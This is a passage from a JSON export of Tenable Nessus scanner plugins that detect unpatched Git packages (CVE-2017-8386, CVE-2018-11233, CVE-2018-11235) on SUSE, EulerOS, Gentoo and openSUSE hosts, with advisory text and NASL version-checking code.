(isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! 
preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"git-core-2.12.3-27.14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"git-core-debuginfo-2.12.3-27.14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"git-debugsource-2.12.3-27.14.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-30T18:18:04", "description": "According to the versions of the git package installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - A flaw was found in the way git-shell handled command-line options for the restricted set of git-shell commands. A remote, authenticated attacker could use this flaw to bypass git-shell restrictions, to view and manipulate files, by abusing the instance of the less command launched using crafted command-line options.(CVE-2017-8386)\n\n - In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs 'git clone\n --recurse-submodules' because submodule 'names' are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with '../' in a name. 
Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.(CVE-2018-11235)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-11-21T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 2.5.1 : git (EulerOS-SA-2018-1377)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8386", "CVE-2018-11235"], "modified": "2022-05-26T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:git", "cpe:/o:huawei:euleros:uvp:2.5.1"], "id": "EULEROS_SA-2018-1377.NASL", "href": "https://www.tenable.com/plugins/nessus/119068", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(119068);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/26\");\n\n script_cve_id(\"CVE-2017-8386\", \"CVE-2018-11235\");\n\n script_name(english:\"EulerOS Virtualization 2.5.1 : git (EulerOS-SA-2018-1377)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the git package installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - A flaw was found in the way git-shell handled\n command-line options for the restricted set of\n git-shell commands. 
A remote, authenticated attacker\n could use this flaw to bypass git-shell restrictions,\n to view and manipulate files, by abusing the instance\n of the less command launched using crafted command-line\n options.(CVE-2017-8386)\n\n - In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x\n before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before\n 2.17.1, remote code execution can occur. With a crafted\n .gitmodules file, a malicious project can execute an\n arbitrary script on a machine that runs 'git clone\n --recurse-submodules' because submodule 'names' are\n obtained from this file, and then appended to\n $GIT_DIR/modules, leading to directory traversal with\n '../' in a name. Finally, post-checkout hooks from a\n submodule are executed, bypassing the intended design\n in which hooks are not obtained from a remote\n server.(CVE-2018-11235)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1377\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?987c11d7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected git packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11235\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2017-8386\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 
value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:2.5.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"2.5.1\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 2.5.1\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"git-1.8.3.1-6.1.h4\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n 
severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T13:16:38", "description": "The remote host is affected by the vulnerability described in GLSA-201805-13 (Git: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Git. Please review the CVE identifiers referenced below for details.\n Impact :\n\n Remote attackers could execute arbitrary code on both client and server.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-05-30T00:00:00", "type": "nessus", "title": "GLSA-201805-13 : Git: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2019-04-05T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:git", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201805-13.NASL", "href": "https://www.tenable.com/plugins/nessus/110212", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201805-13.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110212);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n script_xref(name:\"GLSA\", value:\"201805-13\");\n\n script_name(english:\"GLSA-201805-13 : Git: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201805-13\n(Git: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Git. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n Remote attackers could execute arbitrary code on both client and server.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201805-13\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Git users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-vcs/git-2.16.4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:git\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-vcs/git\", unaffected:make_list(\"ge 2.16.4\"), vulnerable:make_list(\"lt 2.16.4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:28:17", "description": "This update for fixes the following security issues :\n\n - path sanity-checks on NTFS can read arbitrary memory (CVE-2018-11233, boo#1095218)\n\n - arbitrary code execution when recursively cloning a malicious repository (CVE-2018-11235, boo#1095219)", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-27T00:00:00", "type": "nessus", "title": "openSUSE Security Update : git 
(openSUSE-2019-410)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:git", "p-cpe:/a:novell:opensuse:git-arch", "p-cpe:/a:novell:opensuse:git-core", "p-cpe:/a:novell:opensuse:git-core-debuginfo", "p-cpe:/a:novell:opensuse:git-credential-gnome-keyring", "p-cpe:/a:novell:opensuse:git-credential-gnome-keyring-debuginfo", "p-cpe:/a:novell:opensuse:git-credential-libsecret", "p-cpe:/a:novell:opensuse:git-credential-libsecret-debuginfo", "p-cpe:/a:novell:opensuse:git-cvs", "p-cpe:/a:novell:opensuse:git-daemon", "p-cpe:/a:novell:opensuse:git-daemon-debuginfo", "p-cpe:/a:novell:opensuse:git-debuginfo", "p-cpe:/a:novell:opensuse:git-debugsource", "p-cpe:/a:novell:opensuse:git-email", "p-cpe:/a:novell:opensuse:git-gui", "p-cpe:/a:novell:opensuse:git-p4", "p-cpe:/a:novell:opensuse:git-svn", "p-cpe:/a:novell:opensuse:git-svn-debuginfo", "p-cpe:/a:novell:opensuse:git-web", "p-cpe:/a:novell:opensuse:gitk", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2019-410.NASL", "href": "https://www.tenable.com/plugins/nessus/123178", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-410.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(123178);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n\n script_name(english:\"openSUSE Security Update : git (openSUSE-2019-410)\");\n script_summary(english:\"Check for the openSUSE-2019-410 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n 
attribute:\"description\",\n value:\n\"This update for fixes the following security issues :\n\n - path sanity-checks on NTFS can read arbitrary memory\n (CVE-2018-11233, boo#1095218)\n\n - arbitrary code execution when recursively cloning a\n malicious repository (CVE-2018-11235, boo#1095219)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095218\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095219\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-arch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-gnome-keyring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-gnome-keyring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-libsecret\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-libsecret-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-daemon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-svn-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-arch-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-core-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-core-debuginfo-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-credential-gnome-keyring-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-credential-gnome-keyring-debuginfo-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-credential-libsecret-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-credential-libsecret-debuginfo-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-cvs-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-daemon-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", 
reference:\"git-daemon-debuginfo-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-debuginfo-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-debugsource-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-email-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-gui-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-p4-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-svn-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-svn-debuginfo-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-web-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"gitk-2.16.4-lp150.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git / git-arch / git-core / git-core-debuginfo / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:32:09", "description": "This update for fixes the following security issues :\n\n - path sanity-checks on NTFS can read arbitrary memory (CVE-2018-11233, boo#1095218)\n\n - arbitrary code execution when recursively cloning a malicious repository (CVE-2018-11235, boo#1095219)", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-06T00:00:00", "type": "nessus", "title": "openSUSE Security Update : git (openSUSE-2018-557)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:git", 
"p-cpe:/a:novell:opensuse:git-arch", "p-cpe:/a:novell:opensuse:git-core", "p-cpe:/a:novell:opensuse:git-core-debuginfo", "p-cpe:/a:novell:opensuse:git-credential-gnome-keyring", "p-cpe:/a:novell:opensuse:git-credential-gnome-keyring-debuginfo", "p-cpe:/a:novell:opensuse:git-credential-libsecret", "p-cpe:/a:novell:opensuse:git-credential-libsecret-debuginfo", "p-cpe:/a:novell:opensuse:git-cvs", "p-cpe:/a:novell:opensuse:git-daemon", "p-cpe:/a:novell:opensuse:git-daemon-debuginfo", "p-cpe:/a:novell:opensuse:git-debuginfo", "p-cpe:/a:novell:opensuse:git-debugsource", "p-cpe:/a:novell:opensuse:git-email", "p-cpe:/a:novell:opensuse:git-gui", "p-cpe:/a:novell:opensuse:git-p4", "p-cpe:/a:novell:opensuse:git-svn", "p-cpe:/a:novell:opensuse:git-svn-debuginfo", "p-cpe:/a:novell:opensuse:git-web", "p-cpe:/a:novell:opensuse:gitk", "cpe:/o:novell:opensuse:15.0", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2018-557.NASL", "href": "https://www.tenable.com/plugins/nessus/110335", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-557.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110335);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n\n script_name(english:\"openSUSE Security Update : git (openSUSE-2018-557)\");\n script_summary(english:\"Check for the openSUSE-2018-557 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for fixes the following security issues :\n\n - path sanity-checks on NTFS can read arbitrary memory\n 
(CVE-2018-11233, boo#1095218)\n\n - arbitrary code execution when recursively cloning a\n malicious repository (CVE-2018-11235, boo#1095219)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095218\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095219\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-arch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-gnome-keyring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-gnome-keyring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-libsecret\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-credential-libsecret-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-daemon\");\n 
